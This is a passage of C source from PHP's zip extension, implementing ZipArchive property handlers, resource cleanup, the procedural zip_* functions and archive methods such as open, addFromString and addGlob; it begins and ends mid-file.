zip_prop_handler *hnd = NULL;
zend_object_handlers *std_hnd;
if (Z_TYPE_P(member) != IS_STRING) {
ZVAL_COPY(&tmp_member, member);
convert_to_string(&tmp_member);
member = &tmp_member;
cache_slot = NULL;
}
obj = Z_ZIP_P(object);
if (obj->prop_handler != NULL) {
hnd = zend_hash_find_ptr(obj->prop_handler, Z_STR_P(member));
}
if (hnd == NULL) {
std_hnd = zend_get_std_object_handlers();
retval = std_hnd->get_property_ptr_ptr(object, member, type, cache_slot);
}
if (member == &tmp_member) {
zval_dtor(member);
}
return retval;
}
/* }}} */
static zval *php_zip_read_property(zval *object, zval *member, int type, void **cache_slot, zval *rv) /* {{{ */
{
ze_zip_object *obj;
zval tmp_member;
zval *retval = NULL;
zip_prop_handler *hnd = NULL;
zend_object_handlers *std_hnd;
if (Z_TYPE_P(member) != IS_STRING) {
ZVAL_COPY(&tmp_member, member);
convert_to_string(&tmp_member);
member = &tmp_member;
cache_slot = NULL;
}
obj = Z_ZIP_P(object);
if (obj->prop_handler != NULL) {
hnd = zend_hash_find_ptr(obj->prop_handler, Z_STR_P(member));
}
if (hnd != NULL) {
retval = php_zip_property_reader(obj, hnd, rv);
if (retval == NULL) {
retval = &EG(uninitialized_zval);
}
} else {
std_hnd = zend_get_std_object_handlers();
retval = std_hnd->read_property(object, member, type, cache_slot, rv);
}
if (member == &tmp_member) {
zval_dtor(member);
}
return retval;
}
/* }}} */
static int php_zip_has_property(zval *object, zval *member, int type, void **cache_slot) /* {{{ */
{
ze_zip_object *obj;
zval tmp_member;
zip_prop_handler *hnd = NULL;
zend_object_handlers *std_hnd;
int retval = 0;
if (Z_TYPE_P(member) != IS_STRING) {
ZVAL_COPY(&tmp_member, member);
convert_to_string(&tmp_member);
member = &tmp_member;
cache_slot = NULL;
}
obj = Z_ZIP_P(object);
if (obj->prop_handler != NULL) {
hnd = zend_hash_find_ptr(obj->prop_handler, Z_STR_P(member));
}
if (hnd != NULL) {
zval tmp, *prop;
if (type == 2) {
retval = 1;
} else if ((prop = php_zip_property_reader(obj, hnd, &tmp)) != NULL) {
if (type == 1) {
retval = zend_is_true(&tmp);
} else if (type == 0) {
retval = (Z_TYPE(tmp) != IS_NULL);
}
}
zval_ptr_dtor(&tmp);
} else {
std_hnd = zend_get_std_object_handlers();
retval = std_hnd->has_property(object, member, type, cache_slot);
}
if (member == &tmp_member) {
zval_dtor(member);
}
return retval;
}
/* }}} */
static HashTable *php_zip_get_properties(zval *object)/* {{{ */
{
ze_zip_object *obj;
HashTable *props;
zip_prop_handler *hnd;
zend_string *key;
obj = Z_ZIP_P(object);
props = zend_std_get_properties(object);
if (obj->prop_handler == NULL) {
return NULL;
}
ZEND_HASH_FOREACH_STR_KEY_PTR(obj->prop_handler, key, hnd) {
zval *ret, val;
ret = php_zip_property_reader(obj, hnd, &val);
if (ret == NULL) {
ret = &EG(uninitialized_zval);
}
zend_hash_update(props, key, ret);
} ZEND_HASH_FOREACH_END();
return props;
}
/* }}} */
static void php_zip_object_free_storage(zend_object *object) /* {{{ */
{
ze_zip_object * intern = php_zip_fetch_object(object);
int i;
if (!intern) {
return;
}
if (intern->za) {
if (zip_close(intern->za) != 0) {
php_error_docref(NULL, E_WARNING, "Cannot destroy the zip context: %s", zip_strerror(intern->za));
return;
}
intern->za = NULL;
}
if (intern->buffers_cnt>0) {
for (i=0; i<intern->buffers_cnt; i++) {
efree(intern->buffers[i]);
}
efree(intern->buffers);
}
intern->za = NULL;
zend_object_std_dtor(&intern->zo);
if (intern->filename) {
efree(intern->filename);
}
}
/* }}} */
static zend_object *php_zip_object_new(zend_class_entry *class_type) /* {{{ */
{
ze_zip_object *intern;
intern = ecalloc(1, sizeof(ze_zip_object) + zend_object_properties_size(class_type));
intern->prop_handler = &zip_prop_handlers;
zend_object_std_init(&intern->zo, class_type);
object_properties_init(&intern->zo, class_type);
intern->zo.handlers = &zip_object_handlers;
return &intern->zo;
}
/* }}} */
/* {{{ Resource dtors */
/* {{{ php_zip_free_dir */
static void php_zip_free_dir(zend_resource *rsrc)
{
zip_rsrc * zip_int = (zip_rsrc *) rsrc->ptr;
if (zip_int) {
if (zip_int->za) {
if (zip_close(zip_int->za) != 0) {
php_error_docref(NULL, E_WARNING, "Cannot destroy the zip context");
}
zip_int->za = NULL;
}
efree(rsrc->ptr);
rsrc->ptr = NULL;
}
}
/* }}} */
/* {{{ php_zip_free_entry */
static void php_zip_free_entry(zend_resource *rsrc)
{
zip_read_rsrc *zr_rsrc = (zip_read_rsrc *) rsrc->ptr;
if (zr_rsrc) {
if (zr_rsrc->zf) {
zip_fclose(zr_rsrc->zf);
zr_rsrc->zf = NULL;
}
efree(zr_rsrc);
rsrc->ptr = NULL;
}
}
/* }}} */
/* }}}*/
/* reset macro */
/* {{{ function prototypes */
static PHP_MINIT_FUNCTION(zip);
static PHP_MSHUTDOWN_FUNCTION(zip);
static PHP_MINFO_FUNCTION(zip);
/* }}} */
/* {{{ zip_module_entry
*/
zend_module_entry zip_module_entry = {
STANDARD_MODULE_HEADER,
"zip",
zip_functions,
PHP_MINIT(zip),
PHP_MSHUTDOWN(zip),
NULL,
NULL,
PHP_MINFO(zip),
PHP_ZIP_VERSION,
STANDARD_MODULE_PROPERTIES
};
/* }}} */
#ifdef COMPILE_DL_ZIP
ZEND_GET_MODULE(zip)
#endif
/* set macro */
/* {{{ proto resource zip_open(string filename)
Create new zip using source uri for output */
static PHP_NAMED_FUNCTION(zif_zip_open)
{
char resolved_path[MAXPATHLEN + 1];
zip_rsrc *rsrc_int;
int err = 0;
zend_string *filename;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P", &filename) == FAILURE) {
return;
}
if (ZSTR_LEN(filename) == 0) {
php_error_docref(NULL, E_WARNING, "Empty string as source");
RETURN_FALSE;
}
if (ZIP_OPENBASEDIR_CHECKPATH(ZSTR_VAL(filename))) {
RETURN_FALSE;
}
if(!expand_filepath(ZSTR_VAL(filename), resolved_path)) {
RETURN_FALSE;
}
rsrc_int = (zip_rsrc *)emalloc(sizeof(zip_rsrc));
rsrc_int->za = zip_open(resolved_path, 0, &err);
if (rsrc_int->za == NULL) {
efree(rsrc_int);
RETURN_LONG((zend_long)err);
}
rsrc_int->index_current = 0;
rsrc_int->num_files = zip_get_num_files(rsrc_int->za);
RETURN_RES(zend_register_resource(rsrc_int, le_zip_dir));
}
/* }}} */
/* {{{ proto void zip_close(resource zip)
Close a Zip archive */
static PHP_NAMED_FUNCTION(zif_zip_close)
{
zval * zip;
zip_rsrc *z_rsrc = NULL;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "r", &zip) == FAILURE) {
return;
}
if ((z_rsrc = (zip_rsrc *)zend_fetch_resource(Z_RES_P(zip), le_zip_dir_name, le_zip_dir)) == NULL) {
RETURN_FALSE;
}
	/* really closing the zip would break BC :-D */
zend_list_close(Z_RES_P(zip));
}
/* }}} */
/* {{{ proto resource zip_read(resource zip)
Returns the next file in the archive */
static PHP_NAMED_FUNCTION(zif_zip_read)
{
zval *zip_dp;
zip_read_rsrc *zr_rsrc;
int ret;
zip_rsrc *rsrc_int;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "r", &zip_dp) == FAILURE) {
return;
}
if ((rsrc_int = (zip_rsrc *)zend_fetch_resource(Z_RES_P(zip_dp), le_zip_dir_name, le_zip_dir)) == NULL) {
RETURN_FALSE;
}
if (rsrc_int && rsrc_int->za) {
if (rsrc_int->index_current >= rsrc_int->num_files) {
RETURN_FALSE;
}
zr_rsrc = emalloc(sizeof(zip_read_rsrc));
ret = zip_stat_index(rsrc_int->za, rsrc_int->index_current, 0, &zr_rsrc->sb);
if (ret != 0) {
efree(zr_rsrc);
RETURN_FALSE;
}
zr_rsrc->zf = zip_fopen_index(rsrc_int->za, rsrc_int->index_current, 0);
if (zr_rsrc->zf) {
rsrc_int->index_current++;
RETURN_RES(zend_register_resource(zr_rsrc, le_zip_entry));
} else {
efree(zr_rsrc);
RETURN_FALSE;
}
} else {
RETURN_FALSE;
}
}
/* }}} */
/* {{{ proto bool zip_entry_open(resource zip_dp, resource zip_entry [, string mode])
Open a Zip File, pointed by the resource entry */
/* Dummy function to follow the old API */
static PHP_NAMED_FUNCTION(zif_zip_entry_open)
{
zval * zip;
zval * zip_entry;
char *mode = NULL;
size_t mode_len = 0;
zip_read_rsrc * zr_rsrc;
zip_rsrc *z_rsrc;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "rr|s", &zip, &zip_entry, &mode, &mode_len) == FAILURE) {
return;
}
if ((zr_rsrc = (zip_read_rsrc *)zend_fetch_resource(Z_RES_P(zip_entry), le_zip_entry_name, le_zip_entry)) == NULL) {
RETURN_FALSE;
}
if ((z_rsrc = (zip_rsrc *)zend_fetch_resource(Z_RES_P(zip), le_zip_dir_name, le_zip_dir)) == NULL) {
RETURN_FALSE;
}
if (zr_rsrc->zf != NULL) {
RETURN_TRUE;
} else {
RETURN_FALSE;
}
}
/* }}} */
/* {{{ proto bool zip_entry_close(resource zip_ent)
Close a zip entry */
static PHP_NAMED_FUNCTION(zif_zip_entry_close)
{
zval * zip_entry;
zip_read_rsrc * zr_rsrc;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "r", &zip_entry) == FAILURE) {
return;
}
if ((zr_rsrc = (zip_read_rsrc *)zend_fetch_resource(Z_RES_P(zip_entry), le_zip_entry_name, le_zip_entry)) == NULL) {
RETURN_FALSE;
}
RETURN_BOOL(SUCCESS == zend_list_close(Z_RES_P(zip_entry)));
}
/* }}} */
/* {{{ proto mixed zip_entry_read(resource zip_entry [, int len])
Read from an open directory entry */
static PHP_NAMED_FUNCTION(zif_zip_entry_read)
{
zval * zip_entry;
zend_long len = 0;
zip_read_rsrc * zr_rsrc;
zend_string *buffer;
int n = 0;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "r|l", &zip_entry, &len) == FAILURE) {
return;
}
if ((zr_rsrc = (zip_read_rsrc *)zend_fetch_resource(Z_RES_P(zip_entry), le_zip_entry_name, le_zip_entry)) == NULL) {
RETURN_FALSE;
}
if (len <= 0) {
len = 1024;
}
if (zr_rsrc->zf) {
buffer = zend_string_safe_alloc(1, len, 0, 0);
n = zip_fread(zr_rsrc->zf, ZSTR_VAL(buffer), ZSTR_LEN(buffer));
if (n > 0) {
ZSTR_VAL(buffer)[n] = '\0';
ZSTR_LEN(buffer) = n;
RETURN_NEW_STR(buffer);
} else {
zend_string_free(buffer);
RETURN_EMPTY_STRING()
}
} else {
RETURN_FALSE;
}
}
/* }}} */
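/* Common helper for the zip_entry_*() accessors: opt selects the stat field
   returned (0 = name, 1 = compressed size, 2 = uncompressed size,
   3 = compression method as a string). */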
static void php_zip_entry_get_info(INTERNAL_FUNCTION_PARAMETERS, int opt) /* {{{ */
{
zval * zip_entry;
zip_read_rsrc * zr_rsrc;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "r", &zip_entry) == FAILURE) {
return;
}
if ((zr_rsrc = (zip_read_rsrc *)zend_fetch_resource(Z_RES_P(zip_entry), le_zip_entry_name, le_zip_entry)) == NULL) {
RETURN_FALSE;
}
if (!zr_rsrc->zf) {
RETURN_FALSE;
}
switch (opt) {
case 0:
RETURN_STRING((char *)zr_rsrc->sb.name);
break;
case 1:
RETURN_LONG((zend_long) (zr_rsrc->sb.comp_size));
break;
case 2:
RETURN_LONG((zend_long) (zr_rsrc->sb.size));
break;
case 3:
switch (zr_rsrc->sb.comp_method) {
case 0:
RETURN_STRING("stored");
break;
case 1:
RETURN_STRING("shrunk");
break;
case 2:
case 3:
case 4:
case 5:
RETURN_STRING("reduced");
break;
case 6:
RETURN_STRING("imploded");
break;
case 7:
RETURN_STRING("tokenized");
break;
case 8:
RETURN_STRING("deflated");
break;
case 9:
RETURN_STRING("deflatedX");
break;
case 10:
RETURN_STRING("implodedX");
break;
default:
RETURN_FALSE;
}
RETURN_LONG((zend_long) (zr_rsrc->sb.comp_method));
break;
}
}
/* }}} */
/* {{{ proto string zip_entry_name(resource zip_entry)
Return the name given a ZZip entry */
static PHP_NAMED_FUNCTION(zif_zip_entry_name)
{
php_zip_entry_get_info(INTERNAL_FUNCTION_PARAM_PASSTHRU, 0);
}
/* }}} */
/* {{{ proto int zip_entry_compressedsize(resource zip_entry)
Return the compressed size of a ZZip entry */
static PHP_NAMED_FUNCTION(zif_zip_entry_compressedsize)
{
php_zip_entry_get_info(INTERNAL_FUNCTION_PARAM_PASSTHRU, 1);
}
/* }}} */
/* {{{ proto int zip_entry_filesize(resource zip_entry)
Return the actual filesize of a ZZip entry */
static PHP_NAMED_FUNCTION(zif_zip_entry_filesize)
{
php_zip_entry_get_info(INTERNAL_FUNCTION_PARAM_PASSTHRU, 2);
}
/* }}} */
/* {{{ proto string zip_entry_compressionmethod(resource zip_entry)
Return a string containing the compression method used on a particular entry */
static PHP_NAMED_FUNCTION(zif_zip_entry_compressionmethod)
{
php_zip_entry_get_info(INTERNAL_FUNCTION_PARAM_PASSTHRU, 3);
}
/* }}} */
/* {{{ proto mixed ZipArchive::open(string source [, int flags])
Create new zip using source uri for output, return TRUE on success or the error code */
static ZIPARCHIVE_METHOD(open)
{
struct zip *intern;
int err = 0;
zend_long flags = 0;
char *resolved_path;
zend_string *filename;
zval *self = getThis();
ze_zip_object *ze_obj = NULL;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|l", &filename, &flags) == FAILURE) {
return;
}
if (self) {
/* We do not use ZIP_FROM_OBJECT, zip init function here */
ze_obj = Z_ZIP_P(self);
}
if (ZSTR_LEN(filename) == 0) {
php_error_docref(NULL, E_WARNING, "Empty string as source");
RETURN_FALSE;
}
if (ZIP_OPENBASEDIR_CHECKPATH(ZSTR_VAL(filename))) {
RETURN_FALSE;
}
if (!(resolved_path = expand_filepath(ZSTR_VAL(filename), NULL))) {
RETURN_FALSE;
}
if (ze_obj->za) {
/* we already have an opened zip, free it */
if (zip_close(ze_obj->za) != 0) {
php_error_docref(NULL, E_WARNING, "Empty string as source");
efree(resolved_path);
RETURN_FALSE;
}
ze_obj->za = NULL;
}
if (ze_obj->filename) {
efree(ze_obj->filename);
ze_obj->filename = NULL;
}
intern = zip_open(resolved_path, flags, &err);
if (!intern || err) {
efree(resolved_path);
RETURN_LONG((zend_long)err);
}
ze_obj->filename = resolved_path;
ze_obj->filename_len = strlen(resolved_path);
ze_obj->za = intern;
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::setPassword(string password)
Set the password for the active archive */
static ZIPARCHIVE_METHOD(setPassword)
{
struct zip *intern;
zval *self = getThis();
char *password;
size_t password_len;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s", &password, &password_len) == FAILURE) {
return;
}
if (password_len < 1) {
RETURN_FALSE;
} else {
int res = zip_set_default_password(intern, (const char *)password);
if (res == 0) {
RETURN_TRUE;
} else {
RETURN_FALSE;
}
}
}
/* }}} */
/* {{{ proto bool ZipArchive::close()
close the zip archive */
static ZIPARCHIVE_METHOD(close)
{
struct zip *intern;
zval *self = getThis();
ze_zip_object *ze_obj;
int err;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
ze_obj = Z_ZIP_P(self);
if ((err = zip_close(intern))) {
php_error_docref(NULL, E_WARNING, "%s", zip_strerror(intern));
zip_discard(intern);
}
efree(ze_obj->filename);
ze_obj->filename = NULL;
ze_obj->filename_len = 0;
ze_obj->za = NULL;
if (!err) {
RETURN_TRUE;
} else {
RETURN_FALSE;
}
}
/* }}} */
/* {{{ proto string ZipArchive::getStatusString()
* Returns the status error message, system and/or zip messages */
static ZIPARCHIVE_METHOD(getStatusString)
{
struct zip *intern;
zval *self = getThis();
#if LIBZIP_VERSION_MAJOR < 1
int zep, syp, len;
char error_string[128];
#else
zip_error_t *err;
#endif
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
#if LIBZIP_VERSION_MAJOR < 1
zip_error_get(intern, &zep, &syp);
len = zip_error_to_str(error_string, 128, zep, syp);
RETVAL_STRINGL(error_string, len);
#else
err = zip_get_error(intern);
RETVAL_STRING(zip_error_strerror(err));
zip_error_fini(err);
#endif
}
/* }}} */
/* {{{ proto bool ZipArchive::addEmptyDir(string dirname)
Add an empty directory to the archive */
static ZIPARCHIVE_METHOD(addEmptyDir)
{
struct zip *intern;
zval *self = getThis();
char *dirname;
size_t dirname_len;
int idx;
struct zip_stat sb;
char *s;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s",
&dirname, &dirname_len) == FAILURE) {
return;
}
if (dirname_len<1) {
RETURN_FALSE;
}
if (dirname[dirname_len-1] != '/') {
s=(char *)emalloc(dirname_len+2);
strcpy(s, dirname);
s[dirname_len] = '/';
s[dirname_len+1] = '\0';
} else {
s = dirname;
}
idx = zip_stat(intern, s, 0, &sb);
if (idx >= 0) {
RETVAL_FALSE;
} else {
if (zip_add_dir(intern, (const char *)s) == -1) {
RETVAL_FALSE;
}
zip_error_clear(intern);
RETVAL_TRUE;
}
if (s != dirname) {
efree(s);
}
}
/* }}} */
static void php_zip_add_from_pattern(INTERNAL_FUNCTION_PARAMETERS, int type) /* {{{ */
{
struct zip *intern;
zval *self = getThis();
char *path = NULL;
char *remove_path = NULL;
char *add_path = NULL;
size_t add_path_len, remove_path_len = 0, path_len = 0;
zend_long remove_all_path = 0;
zend_long flags = 0;
zval *options = NULL;
int found;
zend_string *pattern;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
/* 1 == glob, 2 == pcre */
if (type == 1) {
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|la",
&pattern, &flags, &options) == FAILURE) {
return;
}
} else {
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|sa",
&pattern, &path, &path_len, &options) == FAILURE) {
return;
}
}
if (ZSTR_LEN(pattern) == 0) {
php_error_docref(NULL, E_NOTICE, "Empty string as pattern");
RETURN_FALSE;
}
if (options && (php_zip_parse_options(options, &remove_all_path, &remove_path, &remove_path_len,
&add_path, &add_path_len) < 0)) {
RETURN_FALSE;
}
if (remove_path && remove_path_len > 1) {
size_t real_len = strlen(remove_path);
if ((real_len > 1) && ((remove_path[real_len - 1] == '/') || (remove_path[real_len - 1] == '\\'))) {
remove_path[real_len - 1] = '\0';
}
}
if (type == 1) {
found = php_zip_glob(ZSTR_VAL(pattern), ZSTR_LEN(pattern), flags, return_value);
} else {
found = php_zip_pcre(pattern, path, path_len, return_value);
}
if (found > 0) {
int i;
zval *zval_file;
for (i = 0; i < found; i++) {
char *file_stripped, *entry_name;
size_t entry_name_len, file_stripped_len;
char entry_name_buf[MAXPATHLEN];
zend_string *basename = NULL;
if ((zval_file = zend_hash_index_find(Z_ARRVAL_P(return_value), i)) != NULL) {
if (remove_all_path) {
basename = php_basename(Z_STRVAL_P(zval_file), Z_STRLEN_P(zval_file), NULL, 0);
file_stripped = ZSTR_VAL(basename);
file_stripped_len = ZSTR_LEN(basename);
} else if (remove_path && strstr(Z_STRVAL_P(zval_file), remove_path) != NULL) {
file_stripped = Z_STRVAL_P(zval_file) + remove_path_len + 1;
file_stripped_len = Z_STRLEN_P(zval_file) - remove_path_len - 1;
} else {
file_stripped = Z_STRVAL_P(zval_file);
file_stripped_len = Z_STRLEN_P(zval_file);
}
if (add_path) {
if ((add_path_len + file_stripped_len) > MAXPATHLEN) {
php_error_docref(NULL, E_WARNING, "Entry name too long (max: %d, %pd given)",
MAXPATHLEN - 1, (add_path_len + file_stripped_len));
zval_ptr_dtor(return_value);
RETURN_FALSE;
}
snprintf(entry_name_buf, MAXPATHLEN, "%s%s", add_path, file_stripped);
entry_name = entry_name_buf;
entry_name_len = strlen(entry_name);
} else {
entry_name = Z_STRVAL_P(zval_file);
entry_name_len = Z_STRLEN_P(zval_file);
}
if (basename) {
zend_string_release(basename);
basename = NULL;
}
if (php_zip_add_file(intern, Z_STRVAL_P(zval_file), Z_STRLEN_P(zval_file),
entry_name, entry_name_len, 0, 0) < 0) {
zval_dtor(return_value);
RETURN_FALSE;
}
}
}
}
}
/* }}} */
/* {{{ proto bool ZipArchive::addGlob(string pattern[,int flags [, array options]])
Add files matching the glob pattern. See php's glob for the pattern syntax. */
static ZIPARCHIVE_METHOD(addGlob)
{
php_zip_add_from_pattern(INTERNAL_FUNCTION_PARAM_PASSTHRU, 1);
}
/* }}} */
/* {{{ proto bool ZipArchive::addPattern(string pattern[, string path [, array options]])
Add files matching the pcre pattern. See php's pcre for the pattern syntax. */
static ZIPARCHIVE_METHOD(addPattern)
{
php_zip_add_from_pattern(INTERNAL_FUNCTION_PARAM_PASSTHRU, 2);
}
/* }}} */
/* {{{ proto bool ZipArchive::addFile(string filepath[, string entryname[, int start [, int length]]])
Add a file to a Zip archive using its path and the name to use. */
static ZIPARCHIVE_METHOD(addFile)
{
struct zip *intern;
zval *self = getThis();
char *entry_name = NULL;
size_t entry_name_len = 0;
zend_long offset_start = 0, offset_len = 0;
zend_string *filename;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|sll",
&filename, &entry_name, &entry_name_len, &offset_start, &offset_len) == FAILURE) {
return;
}
if (ZSTR_LEN(filename) == 0) {
php_error_docref(NULL, E_NOTICE, "Empty string as filename");
RETURN_FALSE;
}
if (entry_name_len == 0) {
entry_name = ZSTR_VAL(filename);
entry_name_len = ZSTR_LEN(filename);
}
if (php_zip_add_file(intern, ZSTR_VAL(filename), ZSTR_LEN(filename), entry_name, entry_name_len, 0, 0) < 0) {
RETURN_FALSE;
} else {
RETURN_TRUE;
}
}
/* }}} */
/* {{{ proto bool ZipArchive::addFromString(string name, string content)
Add a file using content and the entry name */
static ZIPARCHIVE_METHOD(addFromString)
{
struct zip *intern;
zval *self = getThis();
zend_string *buffer;
char *name;
size_t name_len;
ze_zip_object *ze_obj;
struct zip_source *zs;
int pos = 0;
int cur_idx;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "sS",
&name, &name_len, &buffer) == FAILURE) {
return;
}
ze_obj = Z_ZIP_P(self);
if (ze_obj->buffers_cnt) {
ze_obj->buffers = (char **)erealloc(ze_obj->buffers, sizeof(char *) * (ze_obj->buffers_cnt+1));
pos = ze_obj->buffers_cnt++;
} else {
ze_obj->buffers = (char **)emalloc(sizeof(char *));
ze_obj->buffers_cnt++;
pos = 0;
}
ze_obj->buffers[pos] = (char *)emalloc(ZSTR_LEN(buffer) + 1);
memcpy(ze_obj->buffers[pos], ZSTR_VAL(buffer), ZSTR_LEN(buffer) + 1);
zs = zip_source_buffer(intern, ze_obj->buffers[pos], ZSTR_LEN(buffer), 0);
if (zs == NULL) {
RETURN_FALSE;
}
cur_idx = zip_name_locate(intern, (const char *)name, 0);
/* TODO: fix _zip_replace */
if (cur_idx >= 0) {
if (zip_delete(intern, cur_idx) == -1) {
zip_source_free(zs);
RETURN_FALSE;
}
}
if (zip_add(intern, name, zs) == -1) {
zip_source_free(zs);
RETURN_FALSE;
} else {
zip_error_clear(intern);
RETURN_TRUE;
}
}
/* }}} */
/* {{{ proto array ZipArchive::statName(string filename[, int flags])
Returns the information about the zip entry named filename */
static ZIPARCHIVE_METHOD(statName)
{
struct zip *intern;
zval *self = getThis();
zend_long flags = 0;
struct zip_stat sb;
zend_string *name;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|l", &name, &flags) == FAILURE) {
return;
}
PHP_ZIP_STAT_PATH(intern, ZSTR_VAL(name), ZSTR_LEN(name), flags, sb);
RETURN_SB(&sb);
}
/* }}} */
/* {{{ proto array ZipArchive::statIndex(int index[, int flags])
Returns the zip entry information using its index */
static ZIPARCHIVE_METHOD(statIndex)
{
struct zip *intern;
zval *self = getThis();
zend_long index, flags = 0;
struct zip_stat sb;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "l|l",
&index, &flags) == FAILURE) {
return;
}
if (zip_stat_index(intern, index, flags, &sb) != 0) {
RETURN_FALSE;
}
RETURN_SB(&sb);
}
/* }}} */
/* {{{ proto int ZipArchive::locateName(string filename[, int flags])
Returns the index of the entry named filename in the archive */
static ZIPARCHIVE_METHOD(locateName)
{
struct zip *intern;
zval *self = getThis();
zend_long flags = 0;
zend_long idx = -1;
zend_string *name;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|l", &name, &flags) == FAILURE) {
return;
}
if (ZSTR_LEN(name) < 1) {
RETURN_FALSE;
}
idx = (zend_long)zip_name_locate(intern, (const char *)ZSTR_VAL(name), flags);
if (idx >= 0) {
RETURN_LONG(idx);
} else {
RETURN_FALSE;
}
}
/* }}} */
/* {{{ proto string ZipArchive::getNameIndex(int index [, int flags])
Returns the name of the file at position index */
static ZIPARCHIVE_METHOD(getNameIndex)
{
struct zip *intern;
zval *self = getThis();
const char *name;
zend_long flags = 0, index = 0;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "l|l",
&index, &flags) == FAILURE) {
return;
}
name = zip_get_name(intern, (int) index, flags);
if (name) {
RETVAL_STRING((char *)name);
} else {
RETURN_FALSE;
}
}
/* }}} */
/* {{{ proto bool ZipArchive::setArchiveComment(string comment)
Set or remove (NULL/'') the comment of the archive */
static ZIPARCHIVE_METHOD(setArchiveComment)
{
struct zip *intern;
zval *self = getThis();
size_t comment_len;
char * comment;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s", &comment, &comment_len) == FAILURE) {
return;
}
if (zip_set_archive_comment(intern, (const char *)comment, (int)comment_len)) {
RETURN_FALSE;
} else {
RETURN_TRUE;
}
}
/* }}} */
/* {{{ proto string ZipArchive::getArchiveComment([int flags])
Returns the comment of the archive */
static ZIPARCHIVE_METHOD(getArchiveComment)
{
struct zip *intern;
zval *self = getThis();
zend_long flags = 0;
const char * comment;
int comment_len = 0;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "|l", &flags) == FAILURE) {
return;
}
comment = zip_get_archive_comment(intern, &comment_len, (int)flags);
if(comment==NULL) {
RETURN_FALSE;
}
RETURN_STRINGL((char *)comment, (zend_long)comment_len);
}
/* }}} */
/* {{{ proto bool ZipArchive::setCommentName(string name, string comment)
Set or remove (NULL/'') the comment of an entry using its Name */
static ZIPARCHIVE_METHOD(setCommentName)
{
struct zip *intern;
zval *self = getThis();
size_t comment_len, name_len;
char * comment, *name;
int idx;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "ss",
&name, &name_len, &comment, &comment_len) == FAILURE) {
return;
}
if (name_len < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string as entry name");
}
idx = zip_name_locate(intern, name, 0);
if (idx < 0) {
RETURN_FALSE;
}
PHP_ZIP_SET_FILE_COMMENT(intern, idx, comment, comment_len);
}
/* }}} */
/* {{{ proto bool ZipArchive::setCommentIndex(int index, string comment)
Set or remove (NULL/'') the comment of an entry using its index */
static ZIPARCHIVE_METHOD(setCommentIndex)
{
struct zip *intern;
zval *self = getThis();
zend_long index;
size_t comment_len;
char * comment;
struct zip_stat sb;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "ls",
&index, &comment, &comment_len) == FAILURE) {
return;
}
PHP_ZIP_STAT_INDEX(intern, index, 0, sb);
PHP_ZIP_SET_FILE_COMMENT(intern, index, comment, comment_len);
}
/* }}} */
/* those constants/functions are only available in libzip since 0.11.2 */
#ifdef ZIP_OPSYS_DEFAULT
/* {{{ proto bool ZipArchive::setExternalAttributesName(string name, int opsys, int attr [, int flags])
Set external attributes for file in zip, using its name */
static ZIPARCHIVE_METHOD(setExternalAttributesName)
{
struct zip *intern;
zval *self = getThis();
size_t name_len;
char *name;
zend_long flags=0, opsys, attr;
zip_int64_t idx;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "sll|l",
&name, &name_len, &opsys, &attr, &flags) == FAILURE) {
return;
}
if (name_len < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string as entry name");
}
idx = zip_name_locate(intern, name, 0);
if (idx < 0) {
RETURN_FALSE;
}
if (zip_file_set_external_attributes(intern, idx, (zip_flags_t)flags,
(zip_uint8_t)(opsys&0xff), (zip_uint32_t)attr) < 0) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::setExternalAttributesIndex(int index, int opsys, int attr [, int flags])
Set external attributes for file in zip, using its index */
static ZIPARCHIVE_METHOD(setExternalAttributesIndex)
{
struct zip *intern;
zval *self = getThis();
zend_long index, flags=0, opsys, attr;
struct zip_stat sb;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "lll|l",
&index, &opsys, &attr, &flags) == FAILURE) {
return;
}
PHP_ZIP_STAT_INDEX(intern, index, 0, sb);
